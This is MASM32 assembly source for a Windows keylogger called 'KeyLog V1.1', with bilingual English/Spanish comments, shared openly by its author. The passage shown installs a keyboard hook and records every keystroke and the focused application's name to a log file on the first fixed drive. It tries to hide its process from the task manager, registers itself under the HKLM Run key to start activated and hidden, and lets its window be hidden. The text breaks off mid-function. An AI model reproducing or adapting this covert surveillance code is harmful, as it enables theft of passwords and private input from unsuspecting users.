Daniel Pino - ;;Daniel_2ar@hotmail.com;Daniel_2ar@yahoo.com;Daniel_2@speedy.com.ar;Daniel_2@data54.com;;I hope you find this stuff useful!;************************************************************************************************.386.MODEL FLAT, STDCALLOPTION CASEMAP:NONE;******************************************************************************************************************* ;Includes;******************************************************************************************************************* INCLUDE C:\MASM32\INCLUDE\WINDOWS.INCINCLUDE C:\MASM32\INCLUDE\KERNEL32.INCINCLUDE C:\MASM32\INCLUDE\USER32.INCINCLUDE C:\MASM32\INCLUDE\COMCTL32.INCINCLUDE C:\MASM32\INCLUDE\ADVAPI32.INCINCLUDE C:\MASM32\INCLUDE\MASM32.INCINCLUDE C:\KeyLogV1-1_source_code\HKL_DLL\HKL.INCINCLUDELIB C:\MASM32\LIB\KERNEL32.LIBINCLUDELIB C:\MASM32\LIB\USER32.LIBINCLUDELIB C:\MASM32\LIB\COMCTL32.LIBINCLUDELIB C:\MASM32\LIB\ADVAPI32.LIBINCLUDELIB C:\MASM32\LIB\MASM32.LIBINCLUDELIB C:\KeyLogV1-1_source_code\HKL_DLL\HKL.LIB;*******************************************************************************************************************; Prototypes;*******************************************************************************************************************dlgmain PROTO :DWORD, :DWORD, :DWORD, :DWORDRunParameters PROTO addr_cmd_params:DWORDCreateLogFile PROTOSetFilePath PROTOWriteDateStamp PROTOGetDateStamp PROTO addr_buffer:DWORDWriteAppInfoHeader PROTO appnamelen:DWORDWriteKeyPressed PROTO virtualkeycode:DWORDTranslateVirtualKeyCode PROTO virtualkeycode:DWORD, addr_buffer:DWORDdlgabout PROTO :DWORD, :DWORD, :DWORD, :DWORDHideProcess PROTO;*******************************************************************************************************************; Macros;*******************************************************************************************************************;This macro search a char in a string. 
If it finds it, returns in EAX the address of the char;in the string; else, returns NULL in EAX.;;Esta macro busca un caracter en una cadena. Si lo encuentra, devuelve en EAX la direccion ;donde se encuentra el caracter en la cadena; de lo contrario, devuelve NULL en EAX.;*******************************************************************************************************************FindCharInStr MACRO char_to_find:REQ, p_string:REQ, len_string:REQ LOCAL not_found, return CLD MOV AL, char_to_find MOV ECX, len_string PUSH EDI MOV EDI, p_string REPNE SCASB JNZ not_found DEC EDI MOV EAX, EDI POP EDI JMP returnnot_found: POP EDI XOR EAX, EAX return: ENDM ;******************************************************************************************************************* .DATA;*******************************************************************************************************************classname DB "Daniel", 0dlgname DB "Daniel", 0CommandLine LPSTR 0aboutdlgname DB "ABOUTDLG", 0err_cap DB "Error", 0err0 DB "Error while trying to install hook.", 0err1 DB "Error while trying to uninstall hook.", 0previnstance_err DB "Only one instance of KeyLog can run at a time.", 0previnstance_cap DB "KeyLog V1.1", 0button0_cap0 DB "Activate", 0button0_cap1 DB "Deactivate", 0;En la siguiente variable se almacenara la direccion de la ruta y nombre de la aplicacion sobre ;la cual se esta tipeandoaddr_app_name DWORD 0;En la siguiente matriz de bytes se almacenara la ruta y nombre de la aplicacion que tenia el;focoprev_app_name DB 300 DUP (0);Esta variable determina el estado del programa (visible (1) - oculto (0))hidden_mode DWORD 1;---------------------------------------;Variables para el archivo de registro;---------------------------------------h_keylogfile DWORD 0keylogfilepath DB "X:\Klgf.txt", 0keylogfile_err DB "Unable to create log file. 
KeyLogger will exit now", 0keylogfilestamp DB "KeyLog Version 1.1 - Started on: ", 0keylogfilestok DWORD TRUEkeylogfilebuff DB 200 DUP (0)arethereparameters DWORD 0;cmd_token DB "-", 0date DB "MMMM',' dddd dd yyyy", 0time DB "hh':'mm tt", 0line_1 DB "**************************************************",0line_2 DB "--------------------------------------------------", 0infoheader_f1 DB "Application: ", 0infoheader_f2 DB "got focus on: ", 0infoheader_f3 DB "user type: ", 0first_app_hooked DWORD TRUE ;---------------------------------------;Windows' registry variables;Variables para el registro de Windows;---------------------------------------h_regkey DWORD 0subkey DB "Software\Microsoft\Windows\CurrentVersion\run", 0subkey_descrp DB "KeyLogRegEntry", 0keylog_params DB "-ah", 0;-------------------------------------;Strings for special keys;Cadenas para las teclas especiales;-------------------------------------k_escape DB "[ESC]", 0k_tab DB "[TAB]", 0k_f1 DB "[F1]", 0k_f2 DB "[F2]", 0k_f3 DB "[F3]", 0k_f4 DB "[F4]", 0k_f5 DB "[F5]", 0k_f6 DB "[F6]", 0k_f7 DB "[F7]", 0k_f8 DB "[F8]", 0k_f9 DB "[F9]", 0k_f10 DB "[F10]", 0k_f11 DB "[F11]", 0k_f12 DB "[F12]", 0k_printscreen DB "[PRINTSCREEN]", 0k_scrolllock DB "[SCROLLLOCK]", 0k_break DB "[BREAK]", 0k_insert DB "[INSERT]", 0k_home DB "[HOME]", 0k_pageup DB "[PAGEUP]", 0k_delete DB "[DELETE]", 0k_end DB "[END]", 0k_pagedown DB "[PAGEDOWN]", 0k_back DB "[BACK]", 0k_capslock DB "[CAPSLOCK]", 0k_numlock DB "[NUMLOCK]", 0k_shift DB "[SHIFT]", 0k_control DB "[CONTROL]", 0k_alt DB "[ALT]", 0k_left DB "[LEFT]", 0k_up DB "[UP]", 0k_right DB "[RIGHT]", 0k_down DB "[DOWN]", 0k_numpad0 DB "[NUMPAD 0]", 0k_numpad1 DB "[NUMPAD 1]", 0k_numpad2 DB "[NUMPAD 2]", 0k_numpad3 DB "[NUMPAD 3]", 0k_numpad4 DB "[NUMPAD 4]", 0k_numpad5 DB "[NUMPAD 5]", 0k_numpad6 DB "[NUMPAD 6]", 0k_numpad7 DB "[NUMPAD 7]", 0k_numpad8 DB "[NUMPAD 8]", 0k_numpad9 DB "[NUMPAD 9]", 0k_unknown DB "[UNKNOWN]", 0kernel_name DB "KERNEL32.DLL", 0kernel_function DB 
"RegisterServiceProcess", 0buffer DB 100 DUP (0);******************************************************************************************************************* .DATA?;*******************************************************************************************************************hInstance DWORD ?h_Dlg DWORD ?hButton0 DWORD ?hButton1 DWORD ?;***************************************************;Controls' handles variables;Variables para los manejadores de los controles;***************************************************;Push buttons;---------------------------------------------------h_IDC_BUTTON0 DWORD ?h_IDC_BUTTON1 DWORD ?;******************************************************************************************************************* .CONST;*******************************************************************************************************************;Push buttons;---------------------------------------------------IDC_BUTTON0 EQU 400IDC_BUTTON1 EQU 401IDC_BUTTON2 EQU 402IDC_BUTTON3 EQU 403IDC_CHECK00 EQU 500;---------------------------------------------------;User messages;Mensajes personalizados;---------------------------------------------------WM_KEYSTROKE EQU WM_USER + 2 WM_KEYLOGMSG EQU WM_USER + 3;******************************************************************************************************************* .CODE;*******************************************************************************************************************start: INVOKE GetModuleHandle, NULL MOV hInstance, EAX INVOKE GetCommandLine INVOKE dlgmain, hInstance, NULL, NULL, SW_SHOWDEFAULT INVOKE ExitProcess, 0;*******************************************************************************************************************;*******************************************************************************************************************dlgmain PROC hInst:HINSTANCE, hPrevInst:HINSTANCE, CmdLine:LPSTR, CmdShow:DWORD LOCAL wc:WNDCLASSEX, msg:MSG, hDlg:HWND, cmd_params[50]:BYTE; 
;--------------------------------------------------------------------- ;We check whether an instance of this program is already running ;Se determina si ya se esta ejecutando una instancia del programa ;--------------------------------------------------------------------- INVOKE FindWindow, ADDR classname, NULL .IF EAX != NULL INVOKE MessageBox, NULL, ADDR previnstance_err, ADDR previnstance_cap, MB_ICONERROR INVOKE ExitProcess, NULL .ENDIF MOV wc.cbSize, SIZEOF WNDCLASSEX MOV wc.style, CS_HREDRAW or CS_VREDRAW MOV wc.lpfnWndProc, OFFSET dlgproc MOV wc.cbClsExtra, NULL MOV wc.cbWndExtra, DLGWINDOWEXTRA PUSH hInst POP wc.hInstance MOV wc.hbrBackground, COLOR_BTNFACE+1 MOV wc.lpszMenuName, NULL MOV wc.lpszClassName, OFFSET classname INVOKE LoadIcon, hInst, NULL MOV wc.hIcon, EAX MOV wc.hIconSm, EAX INVOKE LoadCursor, NULL, IDC_ARROW MOV wc.hCursor, EAX INVOKE RegisterClassEx, addr wc INVOKE CreateDialogParam, hInstance, ADDR dlgname, NULL, NULL, NULL MOV hDlg, EAX MOV h_Dlg, EAX INVOKE InitCommonControls ;Se obtiene el manejador del boton "Hide" INVOKE GetDlgItem, h_Dlg, IDC_BUTTON1 MOV h_IDC_BUTTON1, EAX ;Se intentara esconder el programa de la lista de procesos de Windows ;We'll try to hide the program from the Windows' task manager INVOKE HideProcess ;--------------------------------------------------------------------- ; We check whether the program should be run at Windows' start up ; Se determina si el programa se ejecuta el iniciar Windows ;--------------------------------------------------------------------- ;The registry key is open to check whether it is already created ;Se abre la clave para determinar la existencia de la subclave INVOKE RegOpenKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, KEY_ALL_ACCESS, ADDR h_regkey .IF EAX == ERROR_SUCCESS ;If it is ;we look for the subkey INVOKE RegQueryValueEx, h_regkey, ADDR subkey_descrp, NULL, NULL, NULL, NULL .IF EAX == ERROR_SUCCESS ;If it does exist ;Se tilda el boton AUTOCHECKBOX INVOKE CheckDlgButton, hDlg, 
IDC_CHECK00, BST_CHECKED .ENDIF ;The key is closed INVOKE RegCloseKey, h_regkey .ENDIF ;--------------------------------------------------------------------- ; We take out the application path in the command line the in order ; to get the parameters only ; Se limpia la linea de comandos por posibles parametros ;--------------------------------------------------------------------- INVOKE GetCommandLine MOV CommandLine, EAX INVOKE StripRangeI, CommandLine, ADDR cmd_params, 22h, 22h ;Any parameter found in the command line is executed ;Se ejecuta cualquier parametro en la linea de comandos ;y se determina si se muestra o no la ventana INVOKE RunParameters, ADDR cmd_params ;--------------------------------------------------------------------- .WHILE TRUE INVOKE GetMessage, ADDR msg,NULL,0,0 .BREAK .IF (!EAX) ;Si EAX = 0 INVOKE IsDialogMessage, hDlg, ADDR msg .IF EAX == FALSE INVOKE TranslateMessage, ADDR msg INVOKE DispatchMessage, ADDR msg .ENDIF .ENDW MOV EAX, msg.wParam RET dlgmain ENDP;*******************************************************************************************************************;Este funcion se encarga de recibir, interpretar y actuar de acuerdo a los mensajes que le ;corresponan.;*******************************************************************************************************************dlgproc PROC hDlg:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM LOCAL temp_buffer:DWORD .IF uMsg == WM_DESTROY ;Se cierra el archivo de registro INVOKE CloseHandle, h_keylogfile INVOKE PostQuitMessage, NULL .ELSEIF uMsg == WM_COMMAND MOV EAX, wParam .IF AX == IDC_BUTTON0 SHR EAX, 16 .IF AX == BN_CLICKED INVOKE GetCurrentState .IF EAX == 0 INVOKE CreateLogFile .IF EAX != 0 INVOKE MessageBox, hDlg, ADDR keylogfile_err, ADDR err_cap, MB_ICONERROR ;Se termina el programa INVOKE ExitProcess, NULL .ENDIF INVOKE StartKeyLogHooking, hDlg .IF EAX == -1 INVOKE MessageBox, hDlg, ADDR err0, ADDR err_cap, MB_ICONERROR .ELSE ;Se guarda la direccion del buffer que 
devuelve la funcion ;ya que es alli donde se almacenara el nombre de la ;aplicacion sobre la cual se esta tipeando MOV addr_app_name, EAX ;Se cambia el titulo del boton "Activar" por "Desactivar" INVOKE SendDlgItemMessage, hDlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap1 .ENDIF ;The Hide button is disabled INVOKE EnableWindow, h_IDC_BUTTON1, TRUE .ELSEIF EAX == 1 ;Se cierra el archivo de registro INVOKE CloseHandle, h_keylogfile INVOKE StopKeyLogHooking .IF EAX == -1 INVOKE MessageBox, hDlg, ADDR err1, ADDR err_cap, MB_ICONERROR .ELSE INVOKE SendDlgItemMessage, hDlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap0 .ENDIF ;The Hide button is disabled INVOKE EnableWindow, h_IDC_BUTTON1, NULL .ENDIF .ENDIF .ELSEIF AX == IDC_BUTTON1 INVOKE ShowWindow, hDlg, SW_HIDE AND hidden_mode, 0 .ELSEIF AX == IDC_BUTTON2 SHR EAX, 16 .IF AX == BN_CLICKED INVOKE DialogBoxParam, hInstance, ADDR aboutdlgname, hDlg, OFFSET dlgabout, NULL .ENDIF .ELSEIF AX == IDC_CHECK00 SHR EAX, 16 .IF AX == BN_CLICKED INVOKE IsDlgButtonChecked, hDlg, IDC_CHECK00 .IF EAX == BST_CHECKED AND temp_buffer, 0 ;Se determina la ruta donde se encuentra este programa INVOKE GlobalAlloc, GPTR, 1000 MOV temp_buffer, EAX INVOKE GetCommandLine INVOKE lstrcpy, temp_buffer, EAX INVOKE szCatStr, temp_buffer, ADDR keylog_params ;Se crea o abre la clave en el registro INVOKE RegCreateKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, ADDR h_regkey, NULL INVOKE lstrlen, temp_buffer ;We set the subkey values ;Se establecen los valores de la subclave INVOKE RegSetValueEx, h_regkey, ADDR subkey_descrp, NULL, REG_SZ, temp_buffer, EAX ;The memory is deallocated ;Se libera la memoria INVOKE GlobalFree, temp_buffer ;The key is closed INVOKE RegCloseKey, h_regkey .ELSE ;The key is open in order to delete the subkey ;Se abre la clave para luego eliminar la subclave INVOKE RegOpenKeyEx, HKEY_LOCAL_MACHINE, ADDR subkey, NULL, KEY_ALL_ACCESS, ADDR h_regkey .IF EAX == 
ERROR_SUCCESS ;Si la clave existe ;Se elimina la subclave INVOKE RegDeleteValue, h_regkey, ADDR subkey_descrp ;The key is closed INVOKE RegCloseKey, h_regkey .ENDIF .ENDIF .ENDIF .ENDIF .ELSEIF uMsg == WM_KEYLOGMSG .IF hidden_mode == 1 INVOKE ShowWindow, hDlg, SW_HIDE AND hidden_mode, 0 .ELSE INVOKE ShowWindow, hDlg, SW_SHOW MOV hidden_mode, 1 ;We put the KeyLog's windows on top INVOKE SetForegroundWindow, hDlg .ENDIF .ELSEIF uMsg == WM_KEYSTROKE ;Applications' names are compared so that we can determine whether ;a new application has the focus INVOKE lstrcmp, ADDR prev_app_name, addr_app_name .IF EAX != 0 ;The info header is written for the new application that ;got the focus INVOKE WriteAppInfoHeader, lParam ;The new application's name is stored for subsequent comparisons INVOKE lstrcpy, ADDR prev_app_name, addr_app_name .ENDIF ;The procedure which will write the key pressed into the file is invoked INVOKE WriteKeyPressed, wParam .ELSE INVOKE DefWindowProc, hDlg, uMsg, wParam, lParam RET .ENDIF XOR EAX, EAX RETdlgproc ENDP;*******************************************************************************************************************;This procedure examines and executes any parameters passed to the program when it was run.;Este procedimiento examina y ejecuta los distintos parametros que puden pasarse al programa;en el momento de su ejecucion.;*******************************************************************************************************************RunParameters PROC USES EBX addr_cmd_params:DWORD ;Se examina la linea de comando en busca del token (" -") de parametros MOV EBX, addr_cmd_params MOV AX, WORD PTR [EBX] .IF AX != "- " ;Si no se encuentra el guion que antecede a los parametros JMP quit .ENDIF ;------------------------------------------------------------------------------ ;"Activate" parameter ('a') ;------------------------------------------------------------------------------ ;Se busca el parametro 'a' (activate) FindCharInStr 'a', 
addr_cmd_params, 49 .IF EAX != NULL INVOKE CreateLogFile .IF EAX != 0 INVOKE MessageBox, h_Dlg, ADDR keylogfile_err, ADDR err_cap, MB_ICONERROR ;The program is finished INVOKE ExitProcess, NULL .ENDIF INVOKE StartKeyLogHooking, h_Dlg .IF EAX == -1 INVOKE MessageBox, h_Dlg, ADDR err0, ADDR err_cap, MB_ICONERROR .ELSE ;We save the address of the buffer returned by the function ;since it's there where the application's name onto which the ;user is typing will be stored ;Se guarda la direccion del buffer que devuelve la funcion ;ya que es alli donde se almacenara el nombre de la ;aplicacion sobre la cual se esta tipeando MOV addr_app_name, EAX ;We change the button caption from "Activate" to "Deactivate" ;Se cambia el titulo del boton "Activar" por "Desactivar" INVOKE SendDlgItemMessage, h_Dlg, IDC_BUTTON0, WM_SETTEXT, NULL, ADDR button0_cap1 .ENDIF ;The Hide button is disabled INVOKE EnableWindow, h_IDC_BUTTON1, TRUE ;------------------------------------------------------------------------------ ;"Hide" parameter('h') ;------------------------------------------------------------------------------ ;We look for paramter 'h' (hide) ;Se busca el parametro 'h' (hide) FindCharInStr 'h', addr_cmd_params, 49 .IF EAX != NULL RET .ENDIF ;------------------------------------------------------------------------------ .ENDIFquit: INVOKE ShowWindow, h_Dlg, SW_SHOWNORMAL INVOKE UpdateWindow, h_Dlg RETRunParameters ENDP;*******************************************************************************************************************;This function creates the file (or opens the existing one) which will store all the keys;being pressed, along with any other info of the application that got the focus.;If it success, return NULL; else, returns -1 (0FFFFFFFFh).;Esta funcion se encarga de crear el archivo (o abrir el existente) donde se escribira el ;registro de las teclas pulsadas junto con algunos datos de la aplicacion que tiene el foco.;Si tuvo exito, devuelve cero; de lo contrario, 
devuelve -1 (0FFFFFFFFh).;*******************************************************************************************************************CreateLogFile PROC ;We set the application path ;Se establece la ruta del archivo INVOKE SetFilePath ;The registry file is created, or the existing one is open ;Se crea o se abre el archivo de registro donde se almacenaran los datos INVOKE CreateFile, ADDR keylogfilepath, GENERIC_READ OR GENERIC_WRITE, NULL, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL .IF EAX == INVALID_HANDLE_VALUE MOV EAX, -1 RET .ENDIF ;The file's handle is saved ;Se guarda el manejador del archivo MOV h_keylogfile, EAX ;If the keyboard login is started, write DateStamp ;Si se inicia la apliacion, escribir el DateStamp .IF keylogfilestok == TRUE INVOKE WriteDateStamp .ENDIF XOR EAX, EAX RETCreateLogFile ENDP;*******************************************************************************************************************;This function determines the path of the registry file by checking all the drives available;in the system.;Esta funcion determina la ruta del archivo de registro del programa (KlgF.txt) examinando;las unidades disponibles en el sistema;*******************************************************************************************************************SetFilePath PROC USES EBX LOCAL driver_letter[4]:BYTE MOV DWORD PTR [driver_letter], " \:C" AND driver_letter[3], 0 INVOKE GetLogicalDrives MOV EBX, EAX SHR EBX, 2 ;Skip test for drives A: & B: .WHILE EBX > 0 SHR EBX, 1 INVOKE GetDriveType, ADDR driver_letter .IF EAX == DRIVE_FIXED .BREAK .ENDIF INC driver_letter .ENDW MOV AL, BYTE PTR [driver_letter] MOV BYTE PTR [keylogfilepath], AL RETSetFilePath ENDP;*******************************************************************************************************************;This procedure writes the session header every time the program is run.;Este procedimiento se encarga de escribir el encabezado de sesion del programa cada vez que se 
;ejecuta.;*******************************************************************************************************************WriteDateStamp PROC LOCAL bytes_written:DWORD, temp:DWORD AND temp, 0 ;If the program is run for the first time, write DateStamp ;Si se ejecuta la primera vez el programa, escribir el DateStamp .IF keylogfilestok == TRUE ;The file pointer is set to the end of the file in order to avoid ;overwriting any other data ;Se posiciona el puntero del archivo final para evitar sobreescribir los ;datos que pueda tener INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END ;We write the Enter key chars ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;An asterisk-line separator is written ;Se escribe la linea separadora de asteriscos INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;KeyLog header ;Encabezado de presentacion INVOKE WriteFile, h_keylogfile, ADDR keylogfilestamp, 33, ADDR bytes_written, NULL INVOKE GetDateStamp, ADDR keylogfilebuff MOV temp, EAX INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, temp, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;An asterisk-line separator is written ;Se escribe la linea separadora de asteriscos INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL INVOKE WriteFile, h_keylogfile, ADDR line_1, 50, ADDR bytes_written, NULL ;The 
keylogfilestok variable is reset in order not to write the KeyLog ;header again ;Se resetea la variable para que no se vuelva a escribir el DateStamp AND keylogfilestok, 0 .ENDIF RETWriteDateStamp ENDP;*******************************************************************************************************************;This function stores into the buffer (whose address is received as a parameter) the string;of the date and time. Returns the length of that string.;Esta funcion se encarga de almacenar en el buffer (cuya direccion recibe como parametro);los caracteres correspondientes a la fecha y hora. Devuelve el largo de la cadena en EAX.;*******************************************************************************************************************GetDateStamp PROC addr_buffer:DWORD LOCAL cont:DWORD ;The local variable cont is reset ;Se resetea la variable local AND cont, 0 ;-------------- ; Date ;-------------- INVOKE GetDateFormat, NULL, NULL, NULL, ADDR date, addr_buffer, 200 ;EAX is decremented in one in order not to include the NULL character of the ;string DEC EAX ADD cont, EAX ;A separator is written ;Se escribe un separador ADD addr_buffer, EAX MOV EBX, addr_buffer MOV BYTE PTR [EBX], ' ' INC addr_buffer INC cont MOV WORD PTR [EBX +1], ' -' INC cont INC cont INC addr_buffer INC addr_buffer ;-------------- ; Time ;-------------- INVOKE GetTimeFormat, NULL, NULL, NULL, ADDR time, addr_buffer, 200 ;EAX is decremented in one in order not to include the NULL character of the ;string ;Se decrementa en 1 EAX para que no quede incluido el cero de fin de cadena ;en la cadena de texto DEC EAX ADD addr_buffer, EAX ADD cont, EAX MOV EAX, cont RETGetDateStamp ENDP;*******************************************************************************************************************;This procedure writes the info header in the KeyLog file. 
It's invoked whenever an application;gets the focus.;*******************************************************************************************************************WriteAppInfoHeader PROC appnamelen:DWORD LOCAL bytes_written:DWORD, temp:DWORD ;The file pointer is set to the end of the file in order to avoid ;overwriting any other data ;Se posiciona el puntero del archivo final para evitar sobreescribir los ;datos que pueda tener INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END ;Code for the second line separator .IF first_app_hooked == TRUE AND first_app_hooked, 0 .ELSE ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;A dash line separator is written ;Se escribe la linea separadora de guiones INVOKE WriteFile, h_keylogfile, ADDR line_2, 50, ADDR bytes_written, NULL INVOKE WriteFile, h_keylogfile, ADDR line_2, 50, ADDR bytes_written, NULL .ENDIF ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;The info header field 1 is written INVOKE WriteFile, h_keylogfile, ADDR infoheader_f1, 13, ADDR bytes_written, NULL ;The application path and name is written: INVOKE WriteFile, h_keylogfile, addr_app_name, appnamelen, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;The info header field 1 is written INVOKE WriteFile, h_keylogfile, ADDR infoheader_f2, 14, ADDR bytes_written, NULL INVOKE GetDateStamp, ADDR keylogfilebuff MOV temp, EAX INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, temp, ADDR bytes_written, NULL 
;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;The info header field 1 is written INVOKE WriteFile, h_keylogfile, ADDR infoheader_f3, 11, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV DWORD PTR [EBX], 0A0D0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 4, ADDR bytes_written, NULL RETWriteAppInfoHeader ENDP;*******************************************************************************************************************;This procedure writes into the file the keys pressed by the user;*******************************************************************************************************************WriteKeyPressed PROC virtualkeycode:DWORD LOCAL bytes_written:DWORD, len_string:DWORD INVOKE TranslateVirtualKeyCode, virtualkeycode, ADDR keylogfilebuff MOV len_string, EAX ;The file pointer is set to the end of the file in order to avoid ;overwriting any other data ;Se posiciona el puntero del archivo final para evitar sobreescribir los ;datos que pueda tener INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END ;The character typed by the user is written INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, len_string, ADDR bytes_written, NULL RETWriteKeyPressed ENDP;*******************************************************************************************************************;This function translates the virtual code of a key being pressed into its name. The result is ;saved into a buffer whose address is received as a parameter. Returns the length of the name of;the key's name.;Esta funcion se encarga de traducir el codigo virtual de una tecla presionada. El resultado;lo deposita en el buffer cuya direccion recibe en el segundo parametro. 
Devuelve el largo;de la cadena traducida resultante.;*******************************************************************************************************************TranslateVirtualKeyCode PROC virtualkeycode:DWORD, addr_buffer:DWORD LOCAL len_string:DWORD ;Local variables are reset AND len_string, 0 MOV EAX, virtualkeycode ;If the virtual code of the key is between "A" (41h) and "Z" (54h) ;Si el codigo virtual de la tecla esta entre "A" (41h) y "Z" (54h) .IF EAX >= 41h && EAX <= 5Ch ;We check whether the Caps Lock key is activated ;Se determinara si la tecla "Bloq Mayus" esta activada INVOKE GetKeyState, VK_CAPITAL .IF EAX == NULL ADD virtualkeycode, 20h .ENDIF MOV EAX, virtualkeycode MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL ;The string of the key's name is 1 byte in length ;El largo de la cadena es de un byte MOV len_string, 1 .ELSEIF EAX == VK_ESCAPE INVOKE lstrcpy, addr_buffer, ADDR k_escape MOV len_string, 5 .ELSEIF EAX == VK_TAB INVOKE lstrcpy, addr_buffer, ADDR k_tab MOV len_string, 5 .ELSEIF EAX == VK_F1 INVOKE lstrcpy, addr_buffer, ADDR k_f1 MOV len_string, 4 .ELSEIF EAX == VK_F2 INVOKE lstrcpy, addr_buffer, ADDR k_f2 MOV len_string, 4 .ELSEIF EAX == VK_F3 INVOKE lstrcpy, addr_buffer, ADDR k_f3 MOV len_string, 4 .ELSEIF EAX == VK_F4 INVOKE lstrcpy, addr_buffer, ADDR k_f4 MOV len_string, 4 .ELSEIF EAX == VK_F5 INVOKE lstrcpy, addr_buffer, ADDR k_f5 MOV len_string, 4 .ELSEIF EAX == VK_F6 INVOKE lstrcpy, addr_buffer, ADDR k_f6 MOV len_string, 4 .ELSEIF EAX == VK_F7 INVOKE lstrcpy, addr_buffer, ADDR k_f7 MOV len_string, 4 .ELSEIF EAX == VK_F8 INVOKE lstrcpy, addr_buffer, ADDR k_f8 MOV len_string, 4 .ELSEIF EAX == VK_F9 INVOKE lstrcpy, addr_buffer, ADDR k_f9 MOV len_string, 4 .ELSEIF EAX == VK_F10 INVOKE lstrcpy, addr_buffer, ADDR k_f10 MOV len_string, 5 .ELSEIF EAX == VK_F11 INVOKE lstrcpy, addr_buffer, ADDR k_f11 MOV len_string, 5 .ELSEIF EAX == VK_F12 INVOKE lstrcpy, addr_buffer, ADDR k_f12 MOV len_string, 5 .ELSEIF EAX == VK_SNAPSHOT INVOKE lstrcpy, 
addr_buffer, ADDR k_printscreen MOV len_string, 13 .ELSEIF EAX == VK_SCROLL INVOKE lstrcpy, addr_buffer, ADDR k_scrolllock MOV len_string, 12 ;(13h) ;(10h) Virtual-key code for the Break key .ELSEIF EAX == 13h INVOKE lstrcpy, addr_buffer, ADDR k_break MOV len_string, 7 .ELSEIF EAX == VK_INSERT INVOKE lstrcpy, addr_buffer, ADDR k_insert MOV len_string, 8 .ELSEIF EAX == VK_HOME INVOKE lstrcpy, addr_buffer, ADDR k_home MOV len_string, 6 .ELSEIF EAX == VK_PGUP INVOKE lstrcpy, addr_buffer, ADDR k_pageup MOV len_string, 8 .ELSEIF EAX == VK_DELETE INVOKE lstrcpy, addr_buffer, ADDR k_delete MOV len_string, 8 .ELSEIF EAX == VK_END INVOKE lstrcpy, addr_buffer, ADDR k_end MOV len_string, 5 .ELSEIF EAX == VK_PGDN INVOKE lstrcpy, addr_buffer, ADDR k_pagedown MOV len_string, 10 .ELSEIF EAX == VK_SPACE MOV EBX, addr_buffer MOV BYTE PTR [EBX], 20h ;The string of the key's name is 1 byte in length ;El largo de la cadena es de un byte MOV len_string, 1 .ELSEIF EAX == VK_BACK INVOKE lstrcpy, addr_buffer, ADDR k_back MOV len_string, 6 .ELSEIF EAX == VK_CAPITAL INVOKE lstrcpy, addr_buffer, ADDR k_capslock MOV len_string, 10 .ELSEIF EAX == VK_NUMLOCK INVOKE lstrcpy, addr_buffer, ADDR k_numlock MOV len_string, 9 ;(10h) Virtual-key code for the Shit key .ELSEIF EAX == 10h INVOKE lstrcpy, addr_buffer, ADDR k_shift MOV len_string, 7 ;(11h) Virtual-key code for the Control key .ELSEIF EAX == 11h INVOKE lstrcpy, addr_buffer, ADDR k_control MOV len_string, 9 ;(12h) Virtual-key code for the Alt key .ELSEIF EAX == 12h INVOKE lstrcpy, addr_buffer, ADDR k_alt MOV len_string, 5 ;(0Dh) Virtual-key code for the Enter key .ELSEIF EAX == VK_RETURN MOV AX, 0A0Dh MOV EBX, addr_buffer MOV WORD PTR [EBX], AX MOV len_string, 2 ;Numbers .ELSEIF EAX >= 30h && EAX <= 39h MOV EAX, virtualkeycode MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL ;The string of the key's name is 1 byte in length ;El largo de la cadena es de un byte MOV len_string, 1 .ELSEIF EAX == VK_LEFT INVOKE lstrcpy, addr_buffer, ADDR k_left MOV 
